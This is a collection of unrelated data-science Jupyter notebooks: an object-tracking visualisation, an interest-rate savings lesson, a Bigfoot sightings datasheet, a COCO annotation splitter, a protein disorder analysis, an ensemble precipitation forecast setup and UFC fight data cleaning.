Whether to draw the score of the object. Default is ``True``
Returns
-------
: :class:`PIL.Image`
Image with tracks drawn
"""
draw = ImageDraw.Draw(image)
for track in tracks:
bboxes = np.array([np.array(state.state_vector[[0, 2, 4, 5]]).reshape(4)
for state in track.states])
x0, y0, w, h = bboxes[-1]
x1 = x0 + w
y1 = y0 + h
draw.rectangle([x0, y0, x1, y1], outline=(255, 0, 0), width=2)
if show_history:
pts = [(box[0] + box[2] / 2, box[1] + box[3] / 2) for box in bboxes]
draw.line(pts, fill=(255, 0, 0), width=2)
class_ = track.metadata['class']['name']
score = round(float(track.metadata['score']), 2)
if show_class and show_score:
draw.text((x0, y1 + 2), '{}:{}'.format(class_, score), fill=(255, 0, 0))
elif show_class:
draw.text((x0, y1 + 2), '{}'.format(class_), fill=(255, 0, 0))
elif show_score:
draw.text((x0, y1 + 2), '{}'.format(score), fill=(255, 0, 0))
return image
fig3, ax3 = plt.subplots(num="MultiTargetTracker output")
fig3.tight_layout()
artists3 = []
print("Running MultiTargetTracker example... Be patient...")
for timestamp, tracks in tracker:
if not (len(artists3) + 1) % 10:
print("Frame: {}/{}".format(len(artists3) + 1, num_frames))
# Read the detections
detections = detector.detections
# Read frame
frame = frame_reader.frame
pixels = copy(frame.pixels)
# Plot output
image = Image.fromarray(pixels)
image = draw_detections(image, detections)
image = draw_tracks(image, tracks)
ax3.axes.xaxis.set_visible(False)
ax3.axes.yaxis.set_visible(False)
fig3.tight_layout()
artist = ax3.imshow(image, animated=True)
artists3.append([artist])
ani3 = animation.ArtistAnimation(fig3, artists3, interval=20, blit=True, repeat_delay=200)
| docs/source/auto_demos/Video_Processing.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Savings Account Yield Model
#
# <img style="center" src="https://static.pexels.com/photos/9660/business-money-pink-coins.jpg" width="500px" height="200px" alt="atom"/>
#
# > **Does money have the same value over time?** The answer is *no*. We have all experienced it.
#
# > Two basic situations:
# 1. <font color=blue>Inflation</font>: how much money did you need to buy chips and a soda 10 years ago? How much do you need today?
# 2. <font color=blue>Interest</font>: having \$10000 MXN available today is not the same as receiving \$10000 MXN in a year, since the former can be invested in a business or a bank account to generate *interest*. Therefore, the \$10000 MXN available today are worth more than the \$10000 MXN to be received in a year.
#
# Reference:
# - <NAME>, <NAME>. *Ingeniería económica básica*, ISBN: 978-607-519-017-4. (Available in the library)
# References:
# - http://www.sympy.org
# - http://matplotlib.org
# - http://www.numpy.org
# - http://ipywidgets.readthedocs.io/en/latest/index.html
# ___
# ## Interest
# We will focus on how the value of money changes over time due to **interest**. There are two types:
# ### Simple interest capitalization
# This type of interest is computed <font color=red>solely and exclusively on the original amount invested</font>. As a consequence, the interest generated does not become part of the invested money, that is, <font color=blue>interest does not earn interest</font>.
#
# Suppose an initial capital $C_0$ is invested for $k$ periods (months, quarters, semesters, years...) at a **simple interest** rate of $i$ per period. At the end of the first period, the capital $C_1$ obtained is:
#
# $$C_1=C_0+iC_0=C_0(1+i).$$
#
# Likewise, since the interest is computed only on the initial capital, at the end of the second period the capital $C_2$ obtained is:
#
# $$C_2=C_1+iC_0=C_0+iC_0+iC_0=C_0(1+2i).$$
#
# Thus, at the end of the $k$-th period, the capital $C_k$ obtained is:
#
# $$C_k=C_{k-1}+iC_0=C_0+kiC_0=C_0(1+ki).$$
# > **Example.** Suppose you have a capital of \$10000 MXN, which is placed in an investment fund paying a simple interest rate of 0.8% per month.
#
# > With a savings goal of \$11000 MXN and no additional deposits, how many months should the money stay invested?
# +
# Library for numerical computation
import numpy as np
# Values given in the problem statement
C_0 = 10000   # initial capital (MXN)
meta = 11000  # savings goal (MXN)
i = 0.008     # monthly simple interest rate
# Solve for k such that C_k >= meta
k = np.ceil((meta/C_0 - 1)/i)  # Note the use of ceil (the number of periods must be an integer)
k = k.astype(int)              # Conversion to integer (for display)
C_k = C_0*(1 + k*i)            # Capital at the end of period k
C_k = round(C_k, 2)            # Round to two decimal places
# Print the answer
print("The number of periods the money must stay invested is ", k, ". At the end of period ", k,
      ", the capital is ", C_k, ".", sep="")
# -
# > <font color=blue>**Activity.**</font>
# > - What happens if the interest rate is 1% per month instead of 0.8%?
# > - What happens if the goal is \$12000 MXN instead of \$11000 MXN?
# +
# Solution
# -
# > The situation above can be illustrated with the following plot.
# +
# Plotting libraries
import matplotlib.pyplot as plt
# Show plots inline
# %matplotlib inline
# Jupyter widgets library
from ipywidgets import *
def interes_simple(C_0, meta, i):
    # Solve for k
    k = np.ceil((meta/C_0 - 1)/i)           # Note the use of ceil
    k = k.astype(int)                       # Conversion to integer
    C_k = C_0*(1+k*i)                       # Capital at the end of period k
    C_k = round(C_k, 2)                     # Round to two decimal places
    # Vector of periods
    kk = np.linspace(0, k, k+1)
    # Vector of capital per period
    CC = C_0*(1 + kk*i)
    # Plot
    plt.figure(num=1); plt.clf()            # Figure 1, clear its contents
    plt.plot(kk, CC, '*', linewidth=3.0)    # Plot the evolution of the capital
    plt.plot(kk, meta*np.ones(k+1), '--k')  # Plot the goal
    plt.xlabel('k')                         # x-axis label
    plt.ylabel('C_k')                       # y-axis label
    plt.grid(True)                          # Grid on
    plt.show()                              # Show the figure
    print("The number of periods the money must stay invested to reach the goal of ", meta, " is ", k,
          ". At the end of period ", k, ", the capital is ", C_k, ".", sep="")
interact_manual(interes_simple, C_0=fixed(10000), meta=(10000,12000,100), i=fixed(0.008));
# -
# As expected, the capital at the $k$-th period $C_k=C_0(1+ki)$ grows linearly with $k$.
# ### Compound interest capitalization
# The capital that generates simple interest remains constant for the entire duration of the investment. In contrast, the interest produced by compound interest in one period <font color=red>becomes capital in the following period</font>. That is, the interest generated at the end of a period <font color=blue>is reinvested in the next period so that it also produces interest</font>.
#
# Suppose an initial capital $C_0$ is lent for a given period of time at an interest rate $i$. The capital obtained at the end of the first period, $C_1$, can be computed as
#
# $$C_1=C_0(1+i).$$
#
# If that amount is lent again at the same interest rate, at the end of the second period the capital $C_2$ is
#
# $$C_2=C_1(1+i)=C_0(1+i)^2.$$
#
# Repeating the process $k$ times, the capital at the end of the $k$-th period, $C_k$, is
#
# $$C_k=C_{k-1}(1+i)=C_0(1+i)^k.$$
#
# **Reference**:
# - https://es.wikipedia.org/wiki/Inter%C3%A9s_compuesto.
# > **Example.** Suppose you have a capital of \$10000 MXN, which is placed in an investment fund paying an interest rate of 0.8% per month.
#
# > With a savings goal of \$11000 MXN and no additional deposits, how many months should the money stay invested?
#
# > Show a plot illustrating the situation.
# +
def interes_compuesto(C_0, meta, i):
    # Solve for k
    k = np.ceil(np.log(meta/C_0)/np.log(1+i))
    k = k.astype(int)
    C_k = C_0*(1+i)**k                      # Capital at the end of period k
    C_k = round(C_k, 2)                     # Round to two decimal places
    # Vector of periods
    kk = np.linspace(0, k, k+1)
    # Vector of capital per period
    CC = C_0*(1+i)**kk
    # Plot
    plt.figure(num=1); plt.clf()            # Figure 1, clear its contents
    plt.plot(kk, CC, '*', linewidth=3.0)    # Plot the evolution of the capital
    plt.plot(kk, meta*np.ones(k+1), '--k')  # Plot the goal
    plt.xlabel('k')                         # x-axis label
    plt.ylabel('C_k')                       # y-axis label
    plt.grid(True)                          # Grid on
    plt.show()                              # Show the figure
    print("The number of periods the money must stay invested to reach the goal of ", meta, " is ", k,
          ". At the end of period ", k, ", the capital is ", C_k, ".", sep="")
interact_manual(interes_compuesto, C_0=fixed(10000), meta=(10000,12000,100), i=fixed(0.008));
# -
# The capital at the $k$-th period $C_k=C_0(1+i)^k$ grows exponentially with $k$.
# > <font color=blue>**Activity.**</font>
# > - Modify the code above to keep the savings goal fixed and vary the compound interest rate.
# ### Continuous compounding of interest
# Continuous compounding is considered a type of compound capitalization in which interest is capitalized at every instant of time $t$. That is, the compounding frequency is infinite (or, equivalently, the compounding period tends to zero).
#
# Suppose an initial capital $C_0$, and let $C(t)$ be the capital accumulated at time $t$. We want to know the capital after a time interval $\Delta t$, given that the effective interest rate for that interval is $i$. From the above we have
#
# $$C(t+\Delta t)=C(t)(1+i)=C(t)(1+r\Delta t),$$
#
# where $r=\frac{i}{\Delta t}$ is the instantaneous interest rate. Manipulating the expression above, we obtain
#
# $$\frac{\log(C(t+\Delta t))-\log(C(t))}{\Delta t}=\frac{\log((1+r\Delta t))}{\Delta t}.$$
#
# Letting $\Delta t\to 0$, we obtain the differential equation
#
# $$\frac{d C(t)}{dt}=r\; C(t),$$
#
# subject to the initial condition (initial amount or capital) $C(0)=C_0$.
#
# This is a first-order linear differential equation, for which the *analytic solution* can be computed.
# +
# Symbolic computation library
import sympy as sym
# To print in TeX format
from sympy import init_printing; init_printing(use_latex='mathjax')
from IPython.display import display
# Symbols t (for time) and r (for the instantaneous interest rate)
t, r = sym.symbols('t r')
# Another way of doing the above:
# t = sym.symbols('t'); r = sym.symbols('r')
# -
# Differential equation
C = sym.Function('C')
eqn = sym.Eq(sym.Derivative(C(t), t), r*C(t))
# Show the equation
display(eqn)
# Solve
display(sym.dsolve(eqn, C(t)))
# with $C_1=C_0$.
#
# The equivalence between the compound interest rate $i$ and the instantaneous interest rate $r$ is given by
#
# $$e^r=1+i.$$
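A quick numerical check of this equivalence (a sketch using NumPy; the 0.8% monthly rate from the examples above is assumed): growing for $k$ periods at compound rate $i$ is the same as continuous growth $e^{rk}$ with $r=\log(1+i)$.

```python
import numpy as np

i = 0.008          # monthly compound interest rate from the examples above
r = np.log(1 + i)  # equivalent instantaneous rate, since e^r = 1 + i

# Compounding k times at rate i matches continuous growth over k periods
k = 12
print(np.isclose((1 + i)**k, np.exp(r*k)))  # → True
```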
# ___
# How can we compute the *numerical solution*?
# +
# Libraries for numerical integration
from scipy.integrate import odeint
# Continuous capitalization model: dC/dt = r*C
def cap_continuo(C, t, r):
    return r*C
# +
def interes_continuo(C_0, meta, r):
    # Solve for t
    t = np.log(meta/C_0)/r
    # Vector of times
    tt = np.linspace(0, t, 100)
    # Vector of capital over time (numerical solution of the ODE)
    CC = odeint(cap_continuo, C_0, tt, args=(r,))
    # Plot
    plt.figure(num=1); plt.clf()                # Figure 1, clear its contents
    plt.plot(tt, CC, '-', linewidth=3.0)        # Plot the evolution of the capital
    plt.plot(tt, meta*np.ones(len(tt)), '--k')  # Plot the goal
    plt.xlabel('t')                             # x-axis label
    plt.ylabel('C(t)')                          # y-axis label
    plt.grid(True)                              # Grid on
    plt.show()                                  # Show the figure
interact_manual(interes_continuo, C_0=fixed(10000), meta=(10000,12000,100), r=fixed(np.log(1+0.008)));
# -
# Note that the above is a continuous approximation of the discrete compound interest model as the compounding frequency tends to infinity
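This limit can be checked numerically: compounding a rate $r$ over $n$ sub-periods gives the growth factor $(1+r/n)^n$, which approaches $e^r$ as $n\to\infty$ (a sketch with an illustrative rate):

```python
import numpy as np

r = 0.10  # illustrative instantaneous annual rate
for n in [1, 12, 365, 10**6]:  # yearly, monthly, daily, near-continuous compounding
    print(n, (1 + r/n)**n)     # approaches e^r as n grows

n = 10**6
print(np.isclose((1 + r/n)**n, np.exp(r), rtol=1e-6))  # → True
```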
# > <font color=blue>**Activity.**</font>
# > - Look up real interest rates at some bank and plan a monthly savings schedule so that you have \$50000 MXN in your account by the time you finish your degree.
# !open .
| Modulo2/Clase_ModeloAhorro_Mod.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# # Datasheet for Bigfoot Sightings Dataset
# <NAME>
#
# Applied Data Science
# ## Motivation for Dataset Creation
#
# ### Why was the dataset created?
# The compiled dataset of Bigfoot sighting reports concatenated with location and weather data was created to analyze and map geographical trends in Bigfoot sightings.
# ### What (other) tasks could the dataset be used for?
# While the dataset was not created by individuals searching for Bigfoot, one obvious application could be to track down Bigfoot based on past sightings.
# The dataset should not be used to track down individuals making reports of Bigfoot sightings, and there are no names associated with the individual reports.
# ### Has the dataset been used for any tasks already?
# This dataset has been used to derive geographical trends and insights in Bigfoot sightings. The creator of the dataset published a blog post detailing his work with the dataset: https://timothyrenner.github.io/datascience/2017/06/30/finding-bigfoot.html
#
# ### Who funded the creation of the dataset?
# No direct funding for the creation of this dataset.
#
#
# ## Dataset Composition
# ### What are the instances?
# Each instance is a Bigfoot sighting report scraped from the BFRO website. It contains the full-text report along with other associated data, including location and weather.
#
# ### Are relationships between instances made explicit in the data?
# Because each report is treated as a discrete instance, there are no explicit relationships between them in the dataset. While relationships may exist between the individual reports, they are not made clear in the data.
#
# ### How many instances of each type are there?
# There are 4,586 Bigfoot sighting reports.
#
# ### What data does each instance consist of?
# Each instance consists of full text of the report, description of location details, county, state, title of report, latitude, longitude, date, report number, report classification and geohash. Each report is concatenated with weather data that includes for each instance: high, middle, and low temperature, dew point, humidity, cloud cover, moon phase, precipitation intensity, precipitation probability, precipitation type, pressure, UV index, visibility, wind bearing, wind speed, and summary of weather.
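A minimal sketch of working with these fields in pandas. The column names below are illustrative stand-ins (the header of the distributed CSV may differ), and a tiny inline sample is used instead of the real file:

```python
import io
import pandas as pd

# Tiny stand-in for the real CSV; column names here are assumptions
sample = io.StringIO(
    "number,title,date,state,county,latitude,longitude,classification\n"
    "1234,Report 1234,2000-06-16,Washington,Skamania,45.5,-121.9,Class A\n"
    "5678,Report 5678,,Ohio,Portage,,,Class B\n"
)
df = pd.read_csv(sample)
df["date"] = pd.to_datetime(df["date"], errors="coerce")  # tolerate missing dates
geocoded = df.dropna(subset=["latitude", "longitude"])    # keep mappable reports
print(len(df), len(geocoded))  # → 2 1
```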
#
# ### Is everything included or does the data rely on external resources?
# Everything is included.
#
# ### Are there recommended data splits or evaluation measures?
# Unknown.
#
# ### What experiments were initially run on this dataset?
# The creator of the dataset published a blog post detailing his work with the dataset: https://timothyrenner.github.io/datascience/2017/06/30/finding-bigfoot.html
#
# ## Data Collection Process
# ### How was the data collected?
# The reports were scraped from the BFRO website www.bfro.net. The weather conditions were powered by Dark Sky API.
# Code for pulling the data can be found here: https://github.com/timothyrenner/bfro_sightings_data
#
# ### Who was involved in the data collection process?
# <NAME> is the sole contributor to the collection of this dataset.
#
# ### Over what time-frame was the data collected?
# The BFRO database has been in existence since 1995, but the reports date back to the 1920s.
#
# ### How was the data associated with each instance acquired?
# The reports were submitted as form responses by individuals. The weather data was acquired via Dark Sky API.
#
# ### Does the dataset contain all possible instances?
# Yes. It is not a sample of a larger set of reports. However, it only contains instances of reports entered in this particular database.
#
# ### Is there information missing from the dataset and why?
# Yes. Some reports exclude information for privacy reasons.
#
# ### Are there any known errors, sources of noise, or redundancies in the data?
# None are known.
# ## Data Processing
# ### What processing/cleaning was done?
# Minimal cleaning was done to remove invalid time and date entries.
# Each report instance was concatenated with associated weather conditions via the Dark Sky API.
#
# ### Was the “raw” data saved in addition to the preprocessed/cleaned data?
# Yes. Original scrape can be found here: https://github.com/timothyrenner/bfro_sightings_data
#
# ### Is the preprocessing software available?
# All of the code used in scraping and preprocessing is available here: https://github.com/timothyrenner/bfro_sightings_data
#
# ### Does this dataset collection/processing procedure achieve the motivation for creating the dataset stated in the first section of this datasheet?
# Yes.
# ## Data Distribution
# ### How is the dataset distributed?
# It is distributed via data.world at the following link: https://data.world/timothyrenner/bfro-sightings-data/workspace/file?filename=bfro_reports_geocoded.csv
#
# ### When will the dataset be released/first distributed?
# The dataset has been released and distributed.
#
# ### What license (if any) is it distributed under?
# MIT License - A short and simple permissive license with conditions only requiring preservation of copyright and license notices. Licensed works, modifications, and larger works may be distributed under different terms and without source code.
#
# ### Are there any fees or access/export restrictions?
# None.
# ## Data Maintenance
# ### Who is supporting/hosting/maintaining the dataset?
# The original creator of the dataset, <NAME>.
#
# ### Will the dataset be updated?
# The dataset was last updated 12/2/17 and will be updated at the will of the original creator.
#
# ### If the dataset becomes obsolete how will this be communicated?
# This is unclear. It may either be communicated by the creator of the dataset, or by the BFRO.
#
# ### Is there a repository link to any/all papers/systems that use this dataset?
# https://github.com/timothyrenner/bfro_sightings_data
#
# ### If others want to extend/augment/build on this dataset, is there a mechanism for them to do so?
# Because the code for pulling the data was made available on github, others may use it to replicate/extend or build on the dataset.
#
# ## Legal & Ethical Considerations
#
# ### If the dataset relates to people or was generated by people, were they informed about the data collection?
# The dataset was created by people who were voluntarily submitting their data to be collected into a common database.
#
# ### If it relates to other ethically protected subjects, have appropriate obligations been met?
# It is unclear if Bigfoot himself is aware that this data is being collected about him ;)
#
# ### If it relates to people, were there any ethical review applications/reviews/approvals?
# None.
#
# ### If it relates to people, were they told what the dataset would be used for and did they consent? What community norms exist for data collected from human communications?
# Because the data in the BFRO database is publicly available, people who contributed to it may not be aware of all uses of the dataset. However, it is implied that they consent to uses of the data because they volunteered the information in pursuit of data collection and analysis being done regarding Bigfoot.
#
# ### If it relates to people, could this dataset expose people to harm or legal action?
# No personal information is collected (i.e. name, address etc.) aside from what is volunteered in the text report. Therefore, it is very unlikely that the data set could expose people to harm.
#
# ### If it relates to people, does it unfairly advantage or disadvantage a particular social group?
# No.
#
# ### If it relates to people, were they provided with privacy guarantees?
# No privacy guarantees were made, but people were not required to submit any personal information.
#
# ### Does the dataset comply with the EU General Data Protection Regulation (GDPR)?
# The data only comes from North America, so GDPR does not apply.
# ### Does the dataset contain information that might be considered sensitive or confidential?
# The dataset does not contain any personally identifying information.
#
# ### Does the dataset contain information that might be considered inappropriate or offensive?
# Information contained within the full-text reports of Bigfoot sightings may contain profanity or be considered inappropriate/offensive because it was submitted by individuals and not censored.
| jnovak01/datasheet.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
import json
import os
import sys
from pycocotools.coco import COCO
from tqdm import tnrange, tqdm_notebook
import copy
class DatasetSplitter():
"""
Parameters:
- annotations_file:
"""
def __init__(self, annotations_file, annotations_output_dir, categories_list, boundaries_list):
# Preliminary error checking
assert os.path.isfile(os.getcwd() + "/" + annotations_file), "Annotations file at path {} does not exist".format(annotations_file)
assert os.path.isdir(os.getcwd() + "/" + annotations_output_dir), "Annotations output dir at path {} does not exist".format(annotations_output_dir)
assert categories_list is not None, "Categories list must be populated"
assert boundaries_list is not None, "Boundaries list must be populated"
assert len(categories_list) == len(boundaries_list), "Boundary list must be the same size as the categories list"
# Assigning variables
self.coco_json = COCO(annotations_file)
self.annotations_output_dir = annotations_output_dir
self.categories_list = categories_list
self.boundaries_list = boundaries_list
# Get image IDs for all images in dataset
self.imgIds = self.coco_json.getImgIds()
self.images = self.coco_json.loadImgs(ids = self.imgIds)
def splitDataset(self):
# Make coco json master list
split_coco_json = {
"images": [],
"annotations": [],
"categories": self.categories_list
}
# Add images to image list
for image in self.images:
split_coco_json["images"].append(image)
# Process each annotation in each image
for x in tnrange(len(self.imgIds), desc = 'Processing image annotations...'):
# Get annotation IDs pertaining to image
annIds = self.coco_json.getAnnIds(imgIds = self.imgIds[x])
# Get all annotations pertaining to image
annotations = self.coco_json.loadAnns(ids = annIds)
for annotation in annotations:
# Make a copy of boundaries list
temp_list = copy.deepcopy(self.boundaries_list)
# Add area to temp list, then sort and find index of area
temp_list.append(annotation["area"])
sorted_list = sorted(temp_list)
index = sorted_list.index(annotation["area"]) + 1
# Change category id to index and add to split coco json master dictionary
annotation["category_id"] = index
split_coco_json["annotations"].append(annotation)
with open(self.annotations_output_dir + "/annotations_split.json", "w") as outfile:
json.dump(split_coco_json, outfile)
print("Saved annotations file to {}".format(self.annotations_output_dir))
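# The append-sort-index trick in `splitDataset` is effectively a binary search over the
# sorted area boundaries. A standalone sketch of the same bucketing using the stdlib
# `bisect` module (the boundary values here mirror the example configuration below):

```python
import bisect

# Area boundaries; annotations get 1-based category ids by where their area lands.
boundaries = [50000, 200000, 900000]

def category_for_area(area, boundaries):
    # Equivalent to splitDataset's append-sort-index: bisect_left counts the
    # boundaries strictly below `area`, and +1 gives the 1-based category id.
    return bisect.bisect_left(boundaries, area) + 1

print(category_for_area(30000, boundaries))   # 1 -> "Small Structure"
print(category_for_area(120000, boundaries))  # 2 -> "Medium Structure"
print(category_for_area(250000, boundaries))  # 3 -> "Other"
```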
# +
categories_list = [
# Area 166 - 50,000
{
"id": 1,
"name": "Small Structure",
"supercategory": "Structure"
},
# Area 50,001 - 200,000
{
"id": 2,
"name": "Medium Structure",
"supercategory": "Structure"
},
# Area 200,001 and above
{
"id": 3,
"name": "Other",
"supercategory": "Structure"
}
]
dataset_splitter = DatasetSplitter( annotations_file = "datasets/Downtown_Sliced/test/annotations.json",
annotations_output_dir = "datasets/Downtown_Sliced/test",
categories_list = categories_list,
boundaries_list = [50000, 200000, 900000])
# -
dataset_splitter.splitDataset()
| tools/SplitDatasetByArea.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: 'Python 3.8.12 64-bit (''base'': conda)'
# name: python3
# ---
# # Pairwise disorder comparison between effectors and reference proteomes - IUpred 1.0 *short*
# +
import json
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import glob
import seaborn as sns
from scipy.stats import mannwhitneyu
import sys
sys.path.append('../src/')
import aepathdisorder as aepd
# %matplotlib inline
# +
# Load maps
bug_map = aepd.load_map('../data/maps/reference_taxa.json')
CR_map = aepd.load_map('../data/maps/CR_taxa.json')
EHEC_map = aepd.load_map('../data/maps/EHEC_taxa.json')
EPEC_map = aepd.load_map('../data/maps/EPEC_taxa.json')
# Load iupred results
bug_iupred = glob.glob('../data/iupred_agg-clas/proteomes/*/*short*.table')
EHEC_iupred = glob.glob('../data/iupred_agg-clas/EHEC_effectors/*short*.table')
EPEC_iupred = glob.glob('../data/iupred_agg-clas/EPEC_effectors/*short*.table')
CR_iupred = glob.glob('../data/iupred_agg-clas/CR_effectors/*short*.table')
# +
#human_df = concatenate_results(human_iupred)
bug_df = aepd.concatenate_results(bug_iupred)
EHEC_df = aepd.concatenate_results(EHEC_iupred)
EPEC_df = aepd.concatenate_results(EPEC_iupred)
CR_df = aepd.concatenate_results(CR_iupred)
effector_types = ['EHEC', 'EPEC', 'CR']
effector_dfs = [EHEC_df, EPEC_df, CR_df]
effector_maps = [EHEC_map, EPEC_map, CR_map]
for df, mapdict in zip(effector_dfs, effector_maps):
#df.drop(['dataset'], axis=1, inplace=True)
df['dataset'] = df['protein_ac'].map(mapdict)
df['collection_type'] = 'Effector'
for df, effector_type in zip(effector_dfs, effector_types):
df['effector_type'] = effector_type
# Make bug taxa strings (stored as int)
bug_df['dataset'] = bug_df['dataset'].astype(str)
# Define references as such
bug_df['collection_type'] = 'Reference'
merged_effector_df = pd.concat(effector_dfs)
# +
bug_efftype_map = {}
for k, v in bug_map.items():
bug_efftype_map[k] = v['type']
bug_efftype_map
# +
effector_taxa = set(merged_effector_df['dataset'])
reference_taxa = set(bug_df['dataset'])
paired_taxa = effector_taxa & reference_taxa
paired_effectors = merged_effector_df[merged_effector_df['dataset'].isin(paired_taxa)]
paired_bugs = bug_df[bug_df['dataset'].isin(paired_taxa)].copy()  # copy to avoid SettingWithCopyWarning when adding a column below
# -
paired_bugs['effector_type'] = paired_bugs['dataset'].map(bug_efftype_map)
final_df = pd.concat([paired_effectors, paired_bugs], ignore_index=True)
final_df.reset_index(inplace=True)
# Drop effectors from Reference collections
final_df = final_df.sort_values(by='collection_type').drop_duplicates(subset='protein_ac')
len(final_df)
# +
sns.catplot(
x='effector_type',
y='disorder_fraction',
hue='collection_type',
data=final_df,
kind='violin',
cut=0)
plt.savefig('../figures/pairwise_iupred-short.png',
dpi=300)
# + tags=[]
mwu_stat_df = aepd.calc_mannwithney(final_df)
mwu_stat_df.to_csv('../data/iupred_agg-clas/mannwithney_iupred-short.tsv', sep='\t', index_label='Effector collection')
mwu_stat_df
# -
ks_stat_df = aepd.calc_kolmogorovsmirnov(final_df)
ks_stat_df.to_csv('../data/iupred_agg-clas/kolmogorovsmirnov_iupred-short.tsv', sep='\t', index_label='Effector collection')
ks_stat_df
| notebooks/disorder_pairwise_comparison_iupred_short.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: py38
# language: python
# name: py38
# ---
# # 1. File I/O Settings
# +
hindcast_data_file = 'test_data/NMME_data_BD.csv' #data used for cross-validated hindcast skill analysis, and to train forecast model
hindcast_has_years = True
hindcast_has_header = False
hindcast_has_obs = True #NOTE: This is mandatory
hindcast_export_file = 'bd.csv' #'None' or the name of a file to save cross validated hindcasts
forecast_data_file = 'test_data/NMME_data_BD_forecast.csv' #data fed to trained model to produce forecasts, or None
forecast_has_years = True
forecast_has_header = False
forecast_has_obs = True #NOTE: for Forecasting, observations are optional
forecast_export_file = 'bd_rtf.csv'
variable = 'Precipitation (mm/day)'
# -
# # 2. Cross-Validated Hindcast Skill Evaluation
# #### 2a. Analysis Settings
mme_methodologies = ['EM', 'MLR', 'ELM'] #list of MME methodologies to use
skill_metrics = [ 'MAE', 'IOA', 'MSE', 'RMSE', 'PearsonCoef', 'SpearmanCoef'] #list of metrics to compute - available: ['SpearmanCoef', 'SpearmanP', 'PearsonCoef', 'PearsonP', 'MSE', 'MAE', 'RMSE', 'IOA']
# #### 2b. Model Parameters
args = {
#EnsembleMean settings
'em_xval_window': 1, #odd number - behavior undefined for even number
#MLR Settings
'mlr_fit_intercept': True, #Whether to calculate the intercept for this model. If set to False, no intercept will be used in calculations (i.e. data is expected to be centered) (https://scikit-learn.org/stable/modules/generated/sklearn.linear_model.LinearRegression.html)
'mlr_xval_window': 1, #odd number - behavior undefined for even number
'mlr_standardization': None, #'std_anomaly' or None
#ELM Settings
'elm_xval_window': 1, #odd number - behavior undefined for even number
'elm_hidden_layer_neurons':10, #number of hidden layer neurons - overridden if using PCA init
'elm_activation': 'sigm', #“lin” for linear, “sigm” or “tanh” for non-linear, “rbf_l1”, “rbf_l2” or “rbf_linf” for radial basis function neurons (https://hpelm.readthedocs.io/en/latest/api/elm.html)
'elm_standardization' : 'minmax', #'minmax' or 'std_anomaly' or None
'elm_minmax_range': [-1, 1] #choose [minimum, maximum] values for minmax scaling. ignored if not using minmax scaling
}
# #### 2c. Model Construction - Do Not Edit
# +
from pyelmmme import *
reader = Reader() #Object that will handle our input data
data = reader.read_txt(hindcast_data_file, has_years=hindcast_has_years, has_obs=hindcast_has_obs, has_header=hindcast_has_header)
mme = MME(data)
mme.train_mmes(mme_methodologies, args)
mme.measure_skill(skill_metrics)
# -
# #### 2d. Cross-Validated Hindcast Timeline - Do Not Edit
ptr = Plotter(mme)
ptr.timeline(methods=mme_methodologies, members=False, obs=True, var=variable)
# #### 2e. Cross-Validated Hindcast Skill Metrics & Distributions - Do Not Edit
ptr.skill_matrix(methods=mme_methodologies, metrics=skill_metrics, obs=True, members=True)
ptr.box_plot(methods=mme_methodologies, obs=True, members=False, var=variable)
# #### 2f. Saving MME & Exporting Cross-Validated Hindcasts - Do Not Edit
mme.export_csv(hindcast_export_file)
# # 3. Real Time Forecasting
# #### 3a. RTF Settings
forecast_methodologies = ['EM', 'MLR', 'ELM' ]
# #### 3b. Computation - do not edit
fcst_data = reader.read_txt(forecast_data_file, has_years=forecast_has_years, has_obs=forecast_has_obs)
mme.add_forecast(fcst_data)
mme.train_rtf_models(forecast_methodologies, args)
mme.make_RTFs(forecast_methodologies)
ptr.bar_plot(methods=mme_methodologies, members=False, obs=forecast_has_obs, var=variable)
mme.export_csv(forecast_export_file, fcst='forecasts', obs=forecast_has_obs)
| pyelmmme/PyELM-MME-1D.ipynb |
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3.9.10 ('ufc_events_eda')
# language: python
# name: python3
# ---
# # Process UFC events/fights dataset
#
# %load_ext nb_black
# %load_ext autoreload
# %autoreload 2
import ufc_events_eda.utils.paths as path
import pandas as pd
import numpy as np
from ufc_events_eda.data.parse_json import parse_json
# ### Read dataset into dataframe
#
df = parse_json(path.data_raw_dir("ufc_events.json"))
df.head()
# ### Print shape, columns and data types
#
# Check references/columns.md to see what each column represents in detail
#
print(df.shape)
print(df.columns)
df.dtypes
# ### Convert numeric strings to float or int
#
num_columns = [
"fighter_1_kd",
"fighter_2_kd",
"fighter_1_str",
"fighter_2_str",
"fighter_1_td",
"fighter_2_td",
"fighter_1_sub",
"fighter_2_sub",
"round",
]
df[num_columns] = df[num_columns].apply(
pd.to_numeric, errors="coerce", downcast="unsigned"
)
df[num_columns].dtypes
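# A quick illustration (toy values, not from the dataset) of what `errors="coerce"` and
# `downcast="unsigned"` do in the cell above: non-numeric strings become NaN, which forces
# a float column, while clean integer columns are downcast to the smallest unsigned type.

```python
import pandas as pd

s_clean = pd.Series(["1", "2", "3"])
s_dirty = pd.Series(["1", "--", "3"])  # "--" is not numeric

clean = pd.to_numeric(s_clean, errors="coerce", downcast="unsigned")
dirty = pd.to_numeric(s_dirty, errors="coerce", downcast="unsigned")

print(clean.dtype)         # uint8: clean integers downcast to the smallest unsigned type
print(dirty.dtype)         # float64: the coerced NaN forces a float column
print(dirty.isna().sum())  # 1
```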
# ### Separate fights from events (keeping event name in fights dataframe)
#
df_events = df.drop_duplicates(subset=["event_name"])[
["event_name", "event_date", "event_location"]
]
df_fights = df.drop(columns=["event_location", "event_date"])
# ### Cast event_date to datetime
#
df_events["event_date"] = pd.to_datetime(df_events["event_date"], format="%B %d, %Y")
# ### Fix inconsistent location entries
#
